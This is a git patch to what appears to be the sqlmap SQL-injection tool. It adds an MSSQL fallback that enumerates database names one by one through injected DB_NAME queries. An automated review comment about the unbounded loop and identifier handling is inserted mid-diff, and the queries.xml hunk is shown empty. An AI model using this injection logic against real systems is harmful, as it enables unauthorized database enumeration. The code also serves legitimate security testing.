From 27fdccc858da73d8482456176e129c2530ac83b7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 3 Jul 2012 20:15:17 +0200 Subject: [PATCH] Update for Issue #55 (falling back to SELECT DB_NAME(N)) --- plugins/dbms/sybase/enumeration.py | 4 ++-- plugins/generic/enumeration.py | 20 ++++++++++++++++++++ xml/queries.xml | 2 +- 3 files changed, 23 insertions(+), 3 deletions(-) diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 38dbfea25..607416e69 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -36,9 +36,9 @@ class Enumeration(GenericEnumeration): query = rootQuery.inband.query if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)) or conf.direct: - blinds = [False, True] + blinds = (False, True) else: - blinds = [True] + blinds = (True,) for blind in blinds: retVal = self.__pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 75ac02730..c1cd0a766 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -764,6 +764,26 @@ class Enumeration: if db: kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) + if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL): + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR)) or conf.direct: + blinds = (False, True) + else: + blinds = (True,) + + for blind in blinds: + count = 0 + kb.data.cachedDbs = [] + while True: + query = rootQuery.inband.query2 % count + value = inject.getValue(query, blind=blind) + if not value: + break + else: + kb.data.cachedDbs.append(unArrayizeValue(value)) + count += 1 + if kb.data.cachedDbs: + break + if not kb.data.cachedDbs: infoMsg = "falling back to current database" logger.info(infoMsg) diff --git a/xml/queries.xml b/xml/queries.xml index 4fb72f59b..878db910e 100644 --- a/xml/queries.xml 
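Review bot: The `while True` loop in the added MSSQL fallback of plugins/generic/enumeration.py ends only when `inject.getValue` returns an empty value, so a response that never comes back empty (a noisy blind channel, or a server that keeps answering with a name) leaves enumeration running with no upper bound. A cap on `count`, or a break when a value repeats, would make termination independent of the remote side. The names are also stored as `unArrayizeValue(value)`, while the context line just above stores `safeSQLIdentificatorNaming(db)`, so the fallback caches identifiers in a different form; presumably it should be `kb.data.cachedDbs.append(safeSQLIdentificatorNaming(unArrayizeValue(value)))`. The `else:` after `break` is redundant and its body can be dedented. The enclosing method starts and ends outside the hunk, so whether later code normalises the cache again cannot be seen here.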
+++ b/xml/queries.xml @@ -183,7 +183,7 @@ - +